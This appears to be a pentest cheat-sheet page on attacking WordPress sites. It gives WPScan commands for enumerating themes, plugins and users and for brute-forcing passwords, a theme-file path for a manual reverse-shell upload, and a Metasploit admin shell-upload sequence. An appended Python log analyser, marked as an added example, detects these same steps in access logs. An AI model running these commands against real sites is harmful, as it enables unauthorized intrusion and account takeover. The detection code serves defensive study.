Learn how to execute the most common WordPress attacks, from username enumeration to uploading a reverse shell to the target b0x.
Install WPscan
apt install wpscan -y
WPscan Parameters
wpscan -h
Update WPscan
wpscan --update
Enumerate WordPress using WPscan
Version
All Themes Installed
wpscan --url http://poplabsec.com -e t
Vulnerable Themes Installed
wpscan --url http://poplabsec.com -e vt
All Plugins Installed
wpscan --url http://poplabsec.com -e p
Vulnerable Plugins Installed
wpscan --url http://poplabsec.com -e vp
WordPress Users
wpscan --url http://poplabsec.com -e u
Brute Force WordPress Passwords
wpscan --url http://poplabsec.com --passwords path-to-wordlist
Help with Metasploit
Upload Reverse Shell to WordPress
Upload Manually
http://<IP>/wordpress/wp-content/themes/twentyfifteen/404.php
Upload using Metasploit
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
msf exploit(wp_admin_shell_upload) > set PASSWORD admin
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit
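Detecting this activity in an access log
The steps above leave recognizable traces on the server. This Python check is an added example, not part of the original page or of WPScan: it flags user enumeration requests, repeated login POSTs, and direct requests to a theme PHP file such as 404.php. The log lines, IP addresses, threshold, and scanner User-Agent string are constructed assumptions.

```python
import re
from collections import Counter, defaultdict

# Apache/Nginx "combined" log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Author-ID and REST API requests are common user enumeration routes.
USER_ENUM_RE = re.compile(r'[?&]author=\d+|/wp-json/wp/v2/users|rest_route=/wp/v2/users')
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")
# Theme templates are normally loaded by WordPress itself, so a direct
# request for one (e.g. .../twentyfifteen/404.php) is worth a look.
THEME_FILE_RE = re.compile(r'/wp-content/themes/[^/]+/[^/?]+\.php')
LOGIN_POST_THRESHOLD = 5  # assumed value; tune to your own login traffic

def analyze(log_text, threshold=LOGIN_POST_THRESHOLD):
    """Return {client_ip: sorted list of finding tags} for one log."""
    posts = Counter()
    findings = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, method, path, ua = m["ip"], m["method"], m["path"], m["ua"]
        if "wpscan" in ua.lower():  # weak signal: the UA can be changed
            findings[ip].add("wpscan-user-agent")
        if USER_ENUM_RE.search(path):
            findings[ip].add("user-enumeration")
        if THEME_FILE_RE.search(path):
            findings[ip].add("direct-theme-php-request")
        if method == "POST" and path.split("?")[0].endswith(LOGIN_PATHS):
            posts[ip] += 1
    for ip, n in posts.items():
        if n >= threshold:
            findings[ip].add("login-brute-force")
    return {ip: sorted(tags) for ip, tags in findings.items()}

def _line(ip, method, path, status, ua):
    return f'{ip} - - [10/May/2024:10:00:00 +0000] "{method} {path} HTTP/1.1" {status} 512 "-" "{ua}"'

SCANNER_UA = "WPScan v3.8.25 (https://wpscan.com/wordpress-security-scanner)"  # constructed
SAMPLE_LOG = "\n".join(  # constructed sample traffic, not real logs
    [_line("203.0.113.7", "GET", "/?author=1", 301, SCANNER_UA)]
    + [_line("203.0.113.7", "POST", "/wp-login.php", 200, SCANNER_UA)] * 6
    + [_line("203.0.113.7", "GET", "/wordpress/wp-content/themes/twentyfifteen/404.php", 200, "Mozilla/5.0"),
       _line("198.51.100.20", "POST", "/wp-login.php", 302, "Mozilla/5.0"),
       _line("198.51.100.20", "GET", "/", 200, "Mozilla/5.0")]
)
if __name__ == "__main__": print(analyze(SAMPLE_LOG))
```

The per-IP count ignores time windows, so run it over a bounded slice of the log (for example one hour) rather than the whole file.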
Wordlists